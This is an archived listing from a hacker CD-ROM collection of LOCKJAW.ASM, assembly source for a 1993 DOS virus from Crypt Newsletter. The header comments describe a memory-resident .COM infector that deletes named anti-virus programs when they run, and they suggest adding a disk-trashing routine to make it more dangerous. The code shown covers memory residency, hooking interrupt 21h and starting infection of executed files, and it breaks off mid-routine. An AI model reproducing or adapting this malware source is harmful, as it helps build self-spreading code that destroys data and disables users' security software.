Hackers Underworld 2: Forbidden Knowledge

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / LOCKJAW.ASM < prev next >

Wrap

Assembly Source File | 1993-01-29 | 18KB | 562 lines

;LOCKJAW: a .COM-infecting resident virus with retaliatory ;anti-anti-virus capability. Programmed and contributed by Nikademus, for ;Crypt Newsletter 12, Feb. 1993. ; ;LOCKJAW is a resident virus which installs itself in ;memory using the same engine as the original Civil War/Proto-T virus. ; ;LOCKJAW hooks interrupt 21 and infects .COM files on execution, appending ;itself to the end of the "host." ;LOCKJAW will infect COMMAND.COM and is fairly transparent to a ;casual user, except when certain anti-virus programs ;(Integrity Master, McAfee's SCAN & ;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded. ;If LOCKJAW is present and any of these programs are employed from ;a write-protected diskette, the virus will, of course, generate ;"write protect" errors. ; ;LOCKJAW's "stinger" code demonstrates the simplicity of creating a strongly ;retaliating virus by quickly deleting the anti-virus program before it ;can execute and then displaying a "chomping" graphic. Even if the anti- ;virus program cannot detect LOCKJAW in memory, it will be deleted. This ;makes it essential that the user know how to either remove the virus from ;memory before beginning anti-virus measures, or at the least run the ;anti-virus component from a write-protected disk. At a time when retail ;anti-virus packages are becoming more complicated - and more likely that the ;average user will run them from default installations on his hard file - ;LOCKJAW's retaliating power makes it a potentially very annoying pest. ;A virus-programmer serious about inconveniencing a system could do a ;number of things with this basic idea. They are; ; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus ; instantly. ; 2. Alter the_stinger routine, so that the virus immediately attacks the ; hard file. The implementation is demonstrated by LOKJAW-DREI, which ; merely makes the disk inaccessible until a warm reboot if an anti-virus ; program is employed against it. By placing ; a BONA FIDE disk-trashing routine here, it becomes very hazardous for ; an unknowing user to employ anti-virus measures on a machine where ; LOCKJAW or a LOCKJAW-like program is memory resident. ; ;These anti-anti-virus strategies are becoming more numerous in viral ;programming. ; ;For example, Mark Ludwig programmed the features of a direct-action ;retaliating virus in his "Computer Virus Developments Quarterly." ;Peach, Groove and Encroacher viruses attack anti-virus software by ;deletion of files central ;to the functionality of the software. ; ;And in this issue, the Sandra virus employs a number ;of anti-anti-virus features. ; ;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and ;DREI infected files from a system, simply delete the "companion" .COM ;duplicates of your executables. Ensure that the machine has been booted ;from a clean disk. To remove the LOCKJAW .COM-appending virus, at this ;time it will be necessary for you to restore the contaminated files from ;a clean back-up. ; .radix 16 code segment model small assume cs:code, ds:code, es:code org 100h len equ offset last - begin vir_len equ len / 16d host: db 0E9h, 03h, 00h, 43h, 44h, 00h ; host dummy begin: call virus ; push i.p. onto the stack virus: jmp after_note note: db '[lÖçk⌡äW].ß¥.ÑîkådëMû$' db '┼Hï$.pΓÖGΓåm.î$.à.{pΓÖ┼ö-┼].√âΓïåñ┼' db '┼håÑk$.┼ó.ÇΓÿ₧' after_note: pop bp ; recalculate change in offset sub bp,109h fix_victim: mov di,0100h ; restore host's lea si,ds:[vict_head+bp] ; ! mov cx,06h ; ! rep movsb ; first 6 bytes Is_I_runnin: mov ax,2C2Ch int 21h ; call to see if installed cmp ax, 0DCDh je Bye_Bye cut_hole: mov ax,cs ; get memory control block dec ax mov ds,ax cmp byte ptr ds:[0000],5a ; check if last block - jne abort mov ax,ds:[0003] sub ax,100 ; decrease memory mov ds:0003,ax Zopy_virus: ; copy to claimed block mov bx,ax ; PSP mov ax,es ; virus start add ax,bx ; in memory mov es,ax mov cx,len ; cx = length of virus mov ax,ds ; restore ds inc ax mov ds,ax lea si,ds:[begin+bp] ; point to start of virus lea di,es:0100 ; point to destination rep movsb ; start copying the virus mov [vir_seg+bp],es mov ax,cs mov es,ax ; restore extra segment Grab_21: cli mov ax,3521h ; request address of interrupt 21 int 21h mov ds,[vir_seg+bp] mov ds:[old_21h-6h],bx mov ds:[old_21h+2-6h],es mov dx,offset Lockjaw - 6h ; revector to virus mov ax,2521h int 21h sti abort: mov ax,cs ; get the hell outa mov ds,ax ; Dodge mov es,ax xor ax,ax Bye_Bye: mov bx,0100h ; hand off to host jmp bx Lockjaw: pushf ; is i checkin if cmp ax,2c2ch ; resident jne My_21h mov ax,0dcdh popf iret My_21h: push ds push es ; save all registers push di push si push ax push bx push cx push dx check_exec: cmp ax,04B00h ; is the file being jne notforme ; executed? mov cs:[name_seg-6],ds mov cs:[name_off-6],dx jmp chk_com ; start potential ; infection notforme: pop dx ; exit pop cx ; restore all registers pop bx pop ax pop si pop di pop es pop ds popf jmp dword ptr cs:[old_21h-6] int21: pushf call dword ptr cs:[old_21h-6] ; int 21h handler jc notforme ; exit on error ret chk_com: cld ; this essentially copies mov di,dx ; the name of the file push ds ; and sets it up for pop es ; comparison to the anti- mov al,'.' ; virus defaults used in repne scasb ; the_stinger call the_stinger ; anti-virus stinger cmp ax, 00ffh ; WAS the program an AV? je notforme cmp word ptr es:[di],'OC' ; is it a .com ? jne notforme ; compare against extension cmp word ptr es:[di+2],'M' ; masks in these two steps jne notforme call Grab_24 ; set critical error handler call set_attrib open_victim: ; open potential host mov ds,cs:[name_seg-6] mov dx,cs:[name_off-6] mov ax,3D02h call int21 jc close_file